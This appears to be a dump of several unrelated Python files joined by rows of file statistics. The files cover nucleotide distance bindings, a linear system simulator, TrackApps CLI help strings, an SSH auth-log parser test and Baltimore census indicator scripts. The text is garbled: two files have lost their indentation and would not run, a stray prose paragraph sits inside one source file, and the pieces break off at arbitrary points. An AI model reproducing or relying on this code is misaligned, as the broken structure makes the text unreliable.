Calculate distances with pairwise-deletion in case of missing
data, by default True
Returns
-------
numpy.ndarray
n*n distance matrix.
'''
if not alignment.flags['C_CONTIGUOUS']:
alignment = numpy.ascontiguousarray(alignment)
n, m = alignment.shape
dist_mat = numpy.zeros((n, n), dtype=numpy.double)
lib.jcDistance(alignment, n, m, pairwise_deletion, dist_mat)
return dist_mat
# == Kimura 2-parameter distance
lib.k2pDistance.restype = None
lib.k2pDistance.argtypes = [
numpy.ctypeslib.ndpointer( # alignment: n * m matrix
dtype=numpy.uint8,
ndim=2,
flags='C_CONTIGUOUS',
),
ctypes.c_int, # n: number of entries
ctypes.c_int, # m: number of sites
ctypes.c_int, # pairwiseDeletion
    numpy.ctypeslib.ndpointer( # (output) distMat: n * n distance matrix
dtype=numpy.double,
ndim=2,
flags='C_CONTIGUOUS',
),
]
def k2p_distance(
alignment: numpy.ndarray,
pairwise_deletion: bool = True,
) -> numpy.ndarray:
    '''k2p_distance
Calculate Kimura 2-parameter distance for a nucleotide alignment.
Parameters
----------
alignment : numpy.ndarray
n*m numpy alignment, where n is the number of entries and m is
the number of sites. Bases must be encoded in the format of
pyckmeans.io.NucleotideAlignment.
pairwise_deletion : bool, optional
Calculate distances with pairwise-deletion in case of missing
data, by default True
Returns
-------
numpy.ndarray
n*n distance matrix.
'''
if not alignment.flags['C_CONTIGUOUS']:
alignment = numpy.ascontiguousarray(alignment)
n, m = alignment.shape
dist_mat = numpy.zeros((n, n), dtype=numpy.double)
lib.k2pDistance(alignment, n, m, pairwise_deletion, dist_mat)
return dist_mat
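Without the compiled `distance.so`, the p-distance can be cross-checked in pure NumPy. This sketch assumes bases are encoded as small unsigned integers (the format `pyckmeans.io.NucleotideAlignment` uses); the alignment values are made up:

```python
import numpy as np

# Hypothetical 3 x 6 alignment: 3 sequences, 6 sites, bases as uint8 codes.
aln = np.array([[1, 2, 3, 4, 1, 2],
                [1, 2, 4, 4, 1, 3],
                [1, 2, 3, 4, 1, 2]], dtype=np.uint8)

n, m = aln.shape
dist = np.zeros((n, n), dtype=np.double)
for i in range(n):
    for j in range(n):
        # p-distance: fraction of sites at which the two sequences differ
        dist[i, j] = np.mean(aln[i] != aln[j])
```

Sequences 0 and 1 differ at 2 of 6 sites, so their p-distance is 1/3; sequences 0 and 2 are identical, so theirs is 0.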
| 27.575758 | 79 | 0.635385 | 545 | 4,550 | 5.220183 | 0.170642 | 0.008436 | 0.034798 | 0.023199 | 0.871705 | 0.871705 | 0.871705 | 0.871705 | 0.871705 | 0.871705 | 0 | 0.004502 | 0.267692 | 4,550 | 164 | 80 | 27.743902 | 0.84934 | 0.415604 | 0 | 0.759036 | 0 | 0 | 0.049959 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036145 | false | 0 | 0.036145 | 0 | 0.108434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
78d684b2dfba8fea52e61767b0aac07646bb57a4 | 2,941 | py | Python | dyn_sim.py | whoiszyc/lfd_lqr | 219910262bc7ea3ac66feceb94d20620de4ff533 | [
"Apache-2.0"
] | null | null | null | dyn_sim.py | whoiszyc/lfd_lqr | 219910262bc7ea3ac66feceb94d20620de4ff533 | [
"Apache-2.0"
] | null | null | null | dyn_sim.py | whoiszyc/lfd_lqr | 219910262bc7ea3ac66feceb94d20620de4ff533 | [
"Apache-2.0"
] | null | null | null | import numpy as np
def dyn_sim_discrete_time(A, Bu, Bd, x0, u, d, t_series):
"""
    Simulate a discrete-time linear system
Args:
A: discrete-time A
Bu: discrete-time B for control
Bd: discrete-time B for disturbance
x0: Initial condition in numpy array nx*1
        u: Control signal in numpy array, [[u]] if constant
        d: Disturbance signal in numpy array, [[d]] if constant
t_series: Time series
Returns: Integration results in numpy array
"""
steps = len(t_series)
nx = x0.shape[0]
nu = u.shape[0]
nd = d.shape[0]
Xt = np.zeros((nx, steps))
Ut = np.zeros((nu, steps))
Dt = np.zeros((nd, steps))
if u.shape[1] == 1 and d.shape[1] == 1:
for ii in range(steps):
Xt[:, [ii]] = x0
Ut[:, [ii]] = u[:, [0]]
Dt[:, [ii]] = d[:, [0]]
x1 = A @ x0 + Bu @ u[:, [0]] + Bd @ d[:, [0]]
x0 = x1
elif u.shape[1] == 1 and d.shape[1] > 1:
for ii in range(steps):
Xt[:, [ii]] = x0
Ut[:, [ii]] = u[:, [0]]
Dt[:, [ii]] = d[:, [ii]]
x1 = A @ x0 + Bu @ u[:, [0]] + Bd @ d[:, [ii]]
x0 = x1
elif u.shape[1] > 1 and d.shape[1] == 1:
for ii in range(steps):
Xt[:, [ii]] = x0
Ut[:, [ii]] = u[:, [ii]]
Dt[:, [ii]] = d[:, [0]]
x1 = A @ x0 + Bu @ u[:, [ii]] + Bd @ d[:, [0]]
x0 = x1
elif u.shape[1] > 1 and d.shape[1] > 1:
for ii in range(steps):
Xt[:, [ii]] = x0
Ut[:, [ii]] = u[:, [ii]]
Dt[:, [ii]] = d[:, [ii]]
x1 = A @ x0 + Bu @ u[:, [ii]] + Bd @ d[:, [ii]]
x0 = x1
else:
print("Input dimensions do not match")
return Xt, Ut, Dt
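A quick sanity check of the constant-input branch on a scalar system. The matrices below are illustrative, not from the module; the update is the same `x1 = A @ x0 + Bu @ u` step used above, with no disturbance:

```python
import numpy as np

# Scalar system x[k+1] = 0.5 x[k] + 1.0 u[k], with u held constant at 1.
A = np.array([[0.5]])
Bu = np.array([[1.0]])
u = np.array([[1.0]])
x = np.array([[0.0]])
for _ in range(60):
    x = A @ x + Bu @ u
# The fixed point of x = 0.5 x + 1 is x* = 2, so x converges to 2.
```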
def dyn_sim_feedback_discrete_time(A, Bu, Bd, x0, u, d, t_series, K):
"""
    Simulate a discrete-time linear system under state feedback u = K @ x
Args:
A: discrete-time A
Bu: discrete-time B for control
Bd: discrete-time B for disturbance
x0: Initial condition in numpy array nx*1
        u: Control signal in numpy array, [[u]] if constant
        d: Disturbance signal in numpy array, [[d]] if constant
        t_series: Time series
        K: State-feedback gain matrix, applied as u = K @ x
Returns: Integration results in numpy array
"""
steps = len(t_series)
nx = x0.shape[0]
nu = u.shape[0]
nd = d.shape[0]
Xt = np.zeros((nx, steps))
Ut = np.zeros((nu, steps))
Dt = np.zeros((nd, steps))
if d.shape[1] == 1:
for ii in range(steps):
Xt[:, [ii]] = x0
Ut[:, [ii]] = K @ x0
x1 = A @ x0 + Bu @ K @ x0 + Bd @ d[:, [0]]
x0 = x1
elif d.shape[1] > 1:
for ii in range(steps):
Xt[:, [ii]] = x0
Ut[:, [ii]] = K @ x0
x1 = A @ x0 + Bu @ K @ x0 + Bd @ d[:, [ii]]
x0 = x1
else:
print("Disturbance dimensions do not match")
return Xt, Ut, Dt
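The closed-loop update `x1 = A @ x0 + Bu @ K @ x0` can be sanity-checked on a scalar unstable plant; the plant and gain below are made-up illustrative values:

```python
import numpy as np

# Unstable scalar plant x[k+1] = 1.2 x[k] + u[k]; feedback u = K x with
# K = -0.9 gives a closed-loop pole of 1.2 - 0.9 = 0.3, which is stable.
A = np.array([[1.2]])
Bu = np.array([[1.0]])
K = np.array([[-0.9]])
x = np.array([[5.0]])
for _ in range(40):
    x = A @ x + Bu @ (K @ x)
# The state decays toward 0 even though the open-loop plant diverges.
```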
| 30.635417 | 69 | 0.455627 | 434 | 2,941 | 3.057604 | 0.140553 | 0.09043 | 0.052751 | 0.036172 | 0.956292 | 0.954785 | 0.948003 | 0.925396 | 0.868124 | 0.839488 | 0 | 0.041848 | 0.374362 | 2,941 | 95 | 70 | 30.957895 | 0.679348 | 0.248555 | 0 | 0.730159 | 0 | 0 | 0.030375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031746 | false | 0 | 0.015873 | 0 | 0.079365 | 0.031746 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
15333ce233d16c5570a1b8f689e5e17af45998aa | 7,650 | py | Python | src/hydratk/extensions/trackapps/translation/en/help.py | hydratk/hydratk-ext-trackapps | 0383b92d49fc1d911ce98414bcd13b48509aaf58 | [
"BSD-3-Clause"
] | null | null | null | src/hydratk/extensions/trackapps/translation/en/help.py | hydratk/hydratk-ext-trackapps | 0383b92d49fc1d911ce98414bcd13b48509aaf58 | [
"BSD-3-Clause"
] | null | null | null | src/hydratk/extensions/trackapps/translation/en/help.py | hydratk/hydratk-ext-trackapps | 0383b92d49fc1d911ce98414bcd13b48509aaf58 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""This code is a part of Hydra Toolkit
.. module:: hydratk.extensions.trackapps.translation.en.help
:platform: Unix
:synopsis: English language translation for TrackApps extension help generator
.. moduleauthor:: Petr Rašek <bowman@hydratk.org>
"""
language = {
'name': 'English',
'ISO-639-1': 'en'
}
''' TrackApps Commands '''
help_cmd = {
'track': 'run trackapps command line extension',
# standalone with option profile trackapps
'run': 'run trackapps command line extension'
}
''' TrackApps Options '''
help_opt = {
'tr-app': {'{h}--tr-app qc|bugzilla|mantis|trac|testlink{e}': {'description': 'application', 'commands': ('track')}},
'tr-action': {'{h}--tr-action read|create|update|delete{e}': {'description': 'action, delete supported for apps: qc|mantis|trac', 'commands': ('track')}},
'tr-type': {'[{h}--tr-type defect|test-folder|test|test-set-folder|test-set|test-instance|test-suite|test-plan|build{e}]': {'description': 'entity type, default defect, supported for actions: read|create|update|delete, apps: qc|testlink', 'commands': ('track')}},
'tr-input': {'[{h}--tr-input <filename>{e}]': {'description': 'filename, content is written to ticket description, supported for actions: create|update', 'commands': ('track')}},
'tr-output': {'[{h}--tr-output <filename>{e}]': {'description': 'filename, writes action output, supported for action: read', 'commands': ('track')}},
'tr-url': {'[{h}--tr-url <url>{e}]': {'description': 'url, configurable', 'commands': ('track')}},
'tr-user': {'[{h}--tr-user <username>{e}]': {'description': 'username, configurable', 'commands': ('track')}},
'tr-passw': {'[{h}--tr-passw <password>{e}]': {'description': 'password, configurable', 'commands': ('track')}},
'tr-dev-key': {'[{h}--tr-dev-key <key>{e}]': {'description': 'developer key, configurable, supported for app: testlink', 'commands': ('track')}},
'tr-domain': {'[{h}--tr-domain <domain>{e}]': {'description': 'domain, configurable, supported for app: qc', 'commands': ('track')}},
'tr-project': {'[{h}--tr-project <project>{e}]': {'description': 'project, configurable, supported for apps: qc|mantis|trac|jira|testlink', 'commands': ('track')}},
'tr-id': {'[{h}--tr-id <num>{e}]': {'description': 'record id, supported for actions: read|update|delete', 'commands': ('track')}},
'tr-fields': {'[{h}--tr-fields <list>{e}]': {'description': 'requested fields, name1,name2,... , supported for action: read', 'commands': ('track')}},
'tr-query': {'[{h}--tr-query <expression>{e}]': {'description': 'query, supported for action: read, apps: qc|bugzilla|trac|jira', 'commands': ('track')}},
'tr-order-by': {'[{h}--tr-order-by <expression>{e}]': {'description': 'record ordering, name1:direction,name2:direction,... , direction asc|desc, supported for action: read, app: qc', 'commands': ('track')}},
'tr-limit': {'[{h}--tr-limit <num>{e}]': {'description': 'limit, supported for action: read, apps: qc|bugzilla|jira', 'commands': ('track')}},
'tr-offset': {'[{h}--tr-offset <num>{e}]': {'description': 'offset, supported for action: read, apps: qc|bugzilla|jira', 'commands': ('track')}},
'tr-page': {'[{h}--tr-page <num>{e}]': {'description': 'record page, supported for action: read, app: mantis', 'commands': ('track')}},
'tr-per-page': {'[{h}--tr-per-page <num>{e}]': {'description': 'records per page, supported for action: read, app: mantis', 'commands': ('track')}},
'tr-params': {'[{h}--tr-params <dict>{e}]': {'description': 'record parameters, name1:value,name2:value,... , supported for actions: create|update', 'commands': ('track')}},
'tr-path': {'[{h}--tr-path <path>{e}]': {'description': 'directory path, dir1/dir2/... , supported for use cases: read/create folder|read/create test set|create test|read/create suite, apps: qc|testlink', 'commands': ('track')}},
'tr-steps': {'[{h}--tr-steps <list>{e}]': {'description': 'test steps delimited by |, step parameters use dictionary form, name1:value,name2:value,...|name1:value,name2:value,... , supported for action: create, app: testlink', 'commands': ('track')}},
# standalone with option profile trackapps
'app': {'{h}--app qc|bugzilla|mantis|trac|testlink{e}': {'description': 'application', 'commands': ('run')}},
'action': {'{h}--action read|create|update|delete{e}': {'description': 'action, delete supported for apps: qc|mantis|trac', 'commands': ('run')}},
'type': {'[{h}--type defect|test-folder|test|test-set-folder|test-set|test-instance|test-suite|test-plan|build{e}]': {'description': 'entity type, default defect, supported for actions: read|create|update|delete, apps: qc|testlink', 'commands': ('run')}},
'input': {'[{h}--input <filename>{e}]': {'description': 'filename, content is written to ticket description, supported for actions: create|update', 'commands': ('run')}},
'output': {'[{h}--output <filename>{e}]': {'description': 'filename, writes action output, supported for action: read', 'commands': ('run')}},
'url': {'[{h}--url <url>{e}]': {'description': 'url, configurable', 'commands': ('run')}},
'user': {'[{h}--user <username>{e}]': {'description': 'username, configurable', 'commands': ('run')}},
'passw': {'[{h}--passw <password>{e}]': {'description': 'password, configurable', 'commands': ('run')}},
'dev-key': {'[{h}--dev-key <key>{e}]': {'description': 'developer key, configurable, supported for app: testlink', 'commands': ('run')}},
'domain': {'[{h}--domain <domain>{e}]': {'description': 'domain, configurable, supported for app: qc', 'commands': ('run')}},
'project': {'[{h}--project <project>{e}]': {'description': 'project, configurable, supported for apps: qc|mantis|trac|jira|testlink', 'commands': ('run')}},
'id': {'[{h}--id <num>{e}]': {'description': 'record id, supported for actions: read|update|delete', 'commands': ('run')}},
'fields': {'[{h}--fields <list>{e}]': {'description': 'requested fields, name1,name2,... , supported for action: read', 'commands': ('run')}},
'query': {'[{h}--query <expression>{e}]': {'description': 'query, supported for action: read, apps: qc|bugzilla|trac|jira', 'commands': ('run')}},
'order-by': {'[{h}--order-by <expression>{e}]': {'description': 'record ordering, name1:direction,name2:direction,... , direction asc|desc, supported for action: read, app: qc', 'commands': ('run')}},
'limit': {'[{h}--limit <num>{e}]': {'description': 'limit, supported for action: read, apps: qc|bugzilla|jira', 'commands': ('run')}},
'offset': {'[{h}--offset <num>{e}]': {'description': 'offset, supported for action: read, apps: qc|bugzilla|jira', 'commands': ('run')}},
'page': {'[{h}--page <num>{e}]': {'description': 'record page, supported for action: read, app: mantis', 'commands': ('run')}},
'per-page': {'[{h}--per-page <num>{e}]': {'description': 'records per page, supported for action: read, app: mantis', 'commands': ('run')}},
'params': {'[{h}--params <dict>{e}]': {'description': 'record parameters, name1:value,name2:value,... , supported for actions: create|update', 'commands': ('run')}},
'path': {'[{h}--path <path>{e}]': {'description': 'directory path, dir1/dir2/... , supported for use cases: read/create folder|read/create test set|create test|read/create suite, apps: qc|testlink', 'commands': ('run')}},
'steps': {'[{h}--steps <list>{e}]': {'description': 'test steps delimited by |, step parameters use dictionary form, name1:value,name2:value,...|name1:value,name2:value,... , supported for action: create, app: testlink', 'commands': ('run')}}
}
| 104.794521 | 267 | 0.630327 | 934 | 7,650 | 5.1606 | 0.142398 | 0.109544 | 0.065353 | 0.073029 | 0.853527 | 0.821162 | 0.817012 | 0.752282 | 0.749378 | 0.748133 | 0 | 0.004291 | 0.116601 | 7,650 | 72 | 268 | 106.25 | 0.708938 | 0.046275 | 0 | 0 | 0 | 0.185185 | 0.778162 | 0.096199 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.037037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
# File: libtf/logparsers/tests/test_auth_log.py
# Repo: ThreshingFloor/libtf @ f1a8710f750639c9b9e2a468ece0d2923bf8c3df (MIT license)
from unittest import TestCase
from mock import mock
from ..tf_auth_log import TFAuthLog
class TestTFAuthLog(TestCase):
def setUp(self):
self.tf_auth_log = TFAuthLog([
'Feb 20 21:54:44 localhost sshd[3402]: Accepted publickey for john from 199.2.2.2 port 63673 ssh2: RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84',
'Feb 21 00:13:35 localhost sshd[7483]: Accepted password for kat from 201.1.33.12 port 58803 ssh2',
'Feb 20 21:54:44 localhost sshd[3402]: Accepted publickey for chuck from 10.0.2.2 port 63673 ssh2: RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84',
'Feb 21 00:13:35 localhost sshd[7483]: Accepted password for sally from 192.168.33.1 port 58803 ssh2',
'Feb 21 08:35:22 localhost sshd[5774]: Failed password for root from 116.31.116.24 port 29160 ssh2',
'Feb 21 19:19:26 localhost sshd[16153]: Failed password for invalid user zuidberg from 142.0.45.14 port 52772 ssh2',
'Feb 21 21:56:12 localhost sshd[3430]: Invalid user test from 10.0.2.2',
'Line that does not match ip regex'
], 'foo')
def test_ports_default_to_common_ssh_ports(self):
self.assertEqual(self.tf_auth_log.ports, [{'port': 22, 'protocol': 'tcp'}])
def test_running_with_no_input_succeeds_but_tracks_no_log_lines(self):
self.tf_auth_log = TFAuthLog([], 'foo')
self.tf_auth_log.run()
self.assertEqual(self.tf_auth_log.noisy_logs, [])
self.assertEqual(self.tf_auth_log.quiet_logs, [])
def test_can_filter_noisy_and_quiet_lines(self):
with mock.patch.object(self.tf_auth_log, '_send_features', return_value={'ips': ['10.0.2.2',
'192.168.33.1',
'116.31.116.24',
'142.0.45.14',
'10.0.2.2']}):
self.tf_auth_log.run()
self.assertEqual(self.tf_auth_log.noisy_logs, [
{'timestamp': 1519202122, 'hostname': 'localhost', 'program': 'sshd', 'processid': '5774',
'message': 'Failed password for root from 116.31.116.24 port 29160 ssh2',
'raw': 'Feb 21 08:35:22 localhost sshd[5774]: Failed password for root from 116.31.116.24 port 29160 '
'ssh2'},
{'timestamp': 1519240766, 'hostname': 'localhost', 'program': 'sshd', 'processid': '16153',
'message': 'Failed password for invalid user zuidberg from 142.0.45.14 port 52772 ssh2',
'raw': 'Feb 21 19:19:26 localhost sshd[16153]: Failed password for invalid user zuidberg from '
'142.0.45.14 port 52772 ssh2'},
{'timestamp': 1519250172, 'hostname': 'localhost', 'program': 'sshd', 'processid': '3430',
'message': 'Invalid user test from 10.0.2.2',
'raw': 'Feb 21 21:56:12 localhost sshd[3430]: Invalid user test from 10.0.2.2'}]
)
self.assertEqual(self.tf_auth_log.quiet_logs, [
{'timestamp': 1519163684, 'hostname': 'localhost', 'program': 'sshd', 'processid': '3402',
'message': 'Accepted publickey for john from 199.2.2.2 port 63673 ssh2: '
'RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84',
'raw': 'Feb 20 21:54:44 localhost sshd[3402]: Accepted publickey for john from 199.2.2.2 port 63673 '
'ssh2: RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84'},
{'timestamp': 1519172015, 'hostname': 'localhost', 'program': 'sshd', 'processid': '7483',
'message': 'Accepted password for kat from 201.1.33.12 port 58803 ssh2',
'raw': 'Feb 21 00:13:35 localhost sshd[7483]: Accepted password for kat from 201.1.33.12 port 58803 '
'ssh2'},
{'timestamp': 1519163684, 'hostname': 'localhost', 'program': 'sshd', 'processid': '3402',
'message': 'Accepted publickey for chuck from 10.0.2.2 port 63673 ssh2: '
'RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84',
'raw': 'Feb 20 21:54:44 localhost sshd[3402]: Accepted publickey for chuck from 10.0.2.2 port 63673 '
'ssh2: RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84'},
{'timestamp': 1519172015, 'hostname': 'localhost', 'program': 'sshd', 'processid': '7483',
'message': 'Accepted password for sally from 192.168.33.1 port 58803 ssh2',
'raw': 'Feb 21 00:13:35 localhost sshd[7483]: Accepted password for sally from 192.168.33.1 port 58803'
' ssh2'},
{'raw': 'Line that does not match ip regex'}])
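The expected epoch values in the assertions above come from syslog-style timestamps, which omit the year and time zone; a minimal sketch of the conversion (assuming year 2018 and UTC, which is what these fixtures imply; `syslog_to_epoch` is a hypothetical helper for illustration, not part of TFAuthLog):

```python
import calendar
import time

def syslog_to_epoch(stamp, year=2018):
    # Syslog timestamps like "Feb 21 08:35:22" carry no year or zone;
    # pin both explicitly, then convert the UTC struct_time to epoch seconds.
    parsed = time.strptime("%d %s" % (year, stamp), "%Y %b %d %H:%M:%S")
    return calendar.timegm(parsed)

# "Feb 21 08:35:22" in 2018 UTC -> 1519202122, matching the noisy_logs fixture.
```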
# File: VitalSigns/indicators.py
# Repo: BNIA/VitalSigns @ 1c06284a7423fb837890b5d4b42567e8f14bf278 (Apache-2.0 license)
# AUTOGENERATED! DO NOT EDIT! File to edit: notebooks/04_Create_Acs_Indicators_Original.ipynb (unless otherwise specified).
__all__ = ['racdiv', 'pasi', 'elheat', 'empl', 'fam', 'female', 'femhhs', 'heatgas', 'hh40inc', 'hh60inc', 'hh75inc',
'hhchpov', 'hhm75', 'hhpov', 'hhs', 'hsdipl', 'lesshs', 'male', 'nilf', 'othrcom', 'p2more', 'pubtran',
'age5', 'age24', 'age64', 'age18', 'age65', 'affordm', 'affordr', 'bahigher', 'carpool', 'drvalone',
'hh25inc', 'mhhi', 'nohhint', 'novhcl', 'paa', 'ppac', 'phisp', 'pwhite', 'sclemp', 'tpop', 'trav14',
'trav29', 'trav45', 'trav44', 'unempl', 'unempr', 'walked']
# Cell
#File: racdiv.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B02001 - Race
# Universe: Total Population
# Uses ACS Table B03002 - HISPANIC OR LATINO ORIGIN BY RACE
# Universe: Total Population
# Table Creates: racdiv, paa, pwhite, pasi, phisp, p2more, ppac
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def racdiv( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B02001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
fileName = ''
for name in glob.glob('AcsDataClean/B03002*5y'+str(year)+'_est.csv'):
fileName = name
df_hisp = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
df_hisp = df_hisp.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
df_hisp = df_hisp.sum(numeric_only=True)
# Append the one column from the other ACS Table
df['B03002_012E_Total_Hispanic_or_Latino'] = df_hisp['B03002_012E_Total_Hispanic_or_Latino']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['African-American%'] = df[ 'B02001_003E_Total_Black_or_African_American_alone' ] / df[ 'B02001_001E_Total' ] * 100
df1['White%'] = df[ 'B02001_002E_Total_White_alone' ] / df[ 'B02001_001E_Total' ] * 100
df1['American Indian%'] = df[ 'B02001_004E_Total_American_Indian_and_Alaska_Native_alone' ]/ df[ 'B02001_001E_Total' ] * 100
df1['Asian%'] = df[ 'B02001_005E_Total_Asian_alone' ] / df[ 'B02001_001E_Total' ] * 100
df1['Native Hawaii/Pac Islander%'] = df[ 'B02001_006E_Total_Native_Hawaiian_and_Other_Pacific_Islander_alone'] / df[ 'B02001_001E_Total' ] * 100
df1['Hisp %'] = df['B03002_012E_Total_Hispanic_or_Latino'] / df[ 'B02001_001E_Total' ] * 100
# =1-(POWER(%AA/100,2)+POWER(%White/100,2)+POWER(%AmerInd/100,2)+POWER(%Asian/100,2) + POWER(%NativeAm/100,2))*(POWER(%Hispanic/100,2) + POWER(1-(%Hispanic/100),2))
df1['Diversity_index'] = ( 1- (
( df1['African-American%'] /100 )**2
+( df1['White%'] /100 )**2
+( df1['American Indian%'] /100 )**2
+( df1['Asian%'] /100 )**2
+( df1['Native Hawaii/Pac Islander%'] /100 )**2
)*(
( df1['Hisp %'] /100 )**2
+(1-( df1['Hisp %'] /100) )**2
) ) * 100
return df1['Diversity_index']
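The Diversity_index expression above is a Simpson-style concentration measure: one term over the mutually exclusive race shares, multiplied by a two-way Hispanic/non-Hispanic term. A minimal standalone sketch of the same arithmetic (`diversity_index` is a hypothetical helper for illustration, not part of this module):

```python
def diversity_index(race_pcts, hisp_pct):
    # race_pcts: percentages (0-100) of mutually exclusive race groups;
    # hisp_pct: percent Hispanic or Latino (0-100).
    race_term = sum((p / 100) ** 2 for p in race_pcts)
    hisp_term = (hisp_pct / 100) ** 2 + (1 - hisp_pct / 100) ** 2
    # Mirrors df1['Diversity_index'] = (1 - race_term * hisp_term) * 100 above.
    return (1 - race_term * hisp_term) * 100
```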
# Cell
#File: pasi.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B03002 - HISPANIC OR LATINO ORIGIN BY RACE
# Universe: Total Population
# Table Creates: racdiv, paa, pwhite, pasi, phisp, p2more, ppac
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def pasi( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B03002*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# B03002 already includes the Hispanic/Latino column; no extra append is needed here.
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
tot = df[ 'B03002_001E_Total' ]
df1['Asian%NH'] = df[ 'B03002_006E_Total_Not_Hispanic_or_Latino_Asian_alone' ]/ tot * 100
return df1['Asian%NH']
# Cell
#File: elheat.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B25040 - HOUSE HEATING FUEL
# Universe - Occupied housing units
# Table Creates: elheat, heatgas
#purpose: Produce Sustainability - Percent of Residences Heated by Electricity Indicator
#input: Year
#output:
import pandas as pd
import glob
def elheat( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B25040*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B25040_004E','B25040_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B25040_004E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B25040_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation + final mods
# ( value[1] / nullif(value[2],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <elheat_14> */ --
WITH tbl AS (
select csa,
( value[1] / nullif(value[2],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B25040_004E','B25040_001E'])
)
update vital_signs.data
